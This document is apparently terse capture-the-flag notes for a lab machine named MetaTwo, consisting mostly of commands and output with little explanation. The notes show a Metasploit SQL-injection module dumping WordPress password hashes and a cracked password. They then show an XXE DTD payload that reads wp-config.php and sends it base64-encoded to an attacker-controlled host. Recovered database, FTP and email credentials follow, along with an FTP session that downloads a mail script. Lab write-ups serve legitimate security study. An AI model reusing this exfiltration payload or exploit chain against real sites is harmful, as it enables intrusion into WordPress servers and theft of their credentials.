Foothold

msf6 > use auxiliary/gather/wp_bookingpress_category_services_sqli
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > options

Module options (auxiliary/gather/wp_bookingpress_category_services_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:h
                                         ost:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploi
                                         t.com/docs/using-metasploit/basics/using-metas
                                         ploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /bookingpress/   yes       The URL of the BookingPress appointment bookin
                                         g page
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set rhosts 10.10.11.186
rhosts => 10.10.11.186
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set vhost metapress.htb
vhost => metapress.htb
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set targeturi events
targeturi => events
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
[*] Running module against 10.10.11.186
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information
Wordpress User Credentials
==========================

 Username  Email                  Hash
 --------  -----                  ----
 admin     [email protected]    $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
 manager   [email protected]  $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70

[*] Auxiliary module execution completed

manager:partylikearockstar

adot@pwndot:~/htb/metatwo$ cat xx3.dtd
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.18:8000/?p=%file;'>" >

adot@pwndot:~/htb/metatwo/CVE-2021-29447/attacker/www$ mv evil.dtd evil1.dtd

adot@pwndot:~/htb/metatwo/CVE-2021-29447/attacker/www$ mv ../xx3.dtd ./evil.dtd

adot@pwndot:~/htb/metatwo/CVE-2021-29447$ make up-mal
php -S 0.0.0.0:8001 -t attacker/www/
[Mon Feb 24 19:27:50 2025] PHP 8.2.27 Development Server (http://0.0.0.0:8001) started

metapress.htb:9NYS_ii@FyL_p5M2NvJ
blog:635Aq@TdqrCwXFUZ

adot@pwndot:~/htb/metatwo$ ftp 10.10.11.186
Connected to 10.10.11.186.
220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
Name (10.10.11.186:adot): metapress.htb
331 Password required for metapress.htb
Password:
230 User metapress.htb logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||17084|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   5 metapress.htb metapress.htb     4096 Oct  5  2022 blog
drwxr-xr-x   3 metapress.htb metapress.htb     4096 Oct  5  2022 mailer
226 Transfer complete
ftp> cd mailer
250 CWD command successful
ftp> ls
229 Entering Extended Passive Mode (|||62785|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   4 metapress.htb metapress.htb     4096 Oct  5  2022 PHPMailer
-rw-r--r--   1 metapress.htb metapress.htb     1126 Jun 22  2022 send_email.php
226 Transfer complete
ftp> get send_email.php
local: send_email.php remote: send_email.php
229 Entering Extended Passive Mode (|||22924|)
150 Opening BINARY mode data connection for send_email.php (1126 bytes)
100% |*******************************************************************|  1126        1.32 MiB/s    00:00 ETA
226 Transfer complete
1126 bytes received in 00:00 (24.10 KiB/s)

[email protected]:Cb4_JmWM8zUZWMu@Ys